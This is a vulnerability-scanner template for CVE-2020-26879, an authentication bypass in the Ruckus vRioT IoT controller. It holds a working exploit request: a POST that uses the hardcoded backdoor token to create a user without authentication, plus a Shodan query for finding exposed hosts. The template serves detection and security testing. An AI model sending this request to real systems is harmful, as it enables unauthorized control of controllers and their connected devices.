id: CVE-2020-26879

info:
  name: Ruckus vRioT IoT Controller - Authentication Bypass
  author: DhiyaneshDk
  severity: critical
  description: |
    Ruckus vRioT through 1.5.1.0.21 contains an API backdoor caused by a hardcoded token in validate_token.py, letting unauthenticated attackers interact with the API without authentication.
  impact: |
    Unauthenticated attackers can interact with the API without authentication via a hardcoded token, allowing complete control over the IoT controller and connected devices.
  remediation: |
    Update to Ruckus vRioT version 1.5.1.0.22 or later.
  reference:
    - https://adepts.of0x.cc/ruckus-vriot-rce/
    - https://adepts.of0x.cc
    - https://twitter.com/TheXC3LL
    - https://x-c3ll.github.io
    - https://github.com/alphaSeclab/sec-daily-2020
    - https://nvd.nist.gov/vuln/detail/CVE-2020-26879
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-26879
    cwe-id: CWE-798
    epss-score: 0.42479
    epss-percentile: 0.98525
    cpe: cpe:2.3:a:commscope:ruckus_vriot:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: commscope
    product: ruckus_vriot
    shodan-query: html:"RIoT Controller"
  tags: cve,cve2020,ruckus,vriot,iot,api,backdoor,auth-bypass,vkev,vuln

variables:
  username: "{{randstr_1}}"
  password: "{{randstr_2}}"

http:
  - raw:
      - |
        POST /service/v1/createUser HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: OlDkR+oocZg=

        {"username": "{{username}}", "password": "{{password}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"ok": 1}'
          - '{"message":'
        condition: and

      - type: word
        part: body
        words:
          - 'Invalid JSON'
        negative: true

      - type: status
        status:
          - 200
# digest: 490a0046304402204d8a529d364c62aad504aaf47e9d0058b75dd63bed1ba5c2885dde82903e892a0220196f5e5041d730294c0ed695c001952b470d4e13bee7b75bdc0388c93092ae43:922c64590222798bb761d5b6d8e72950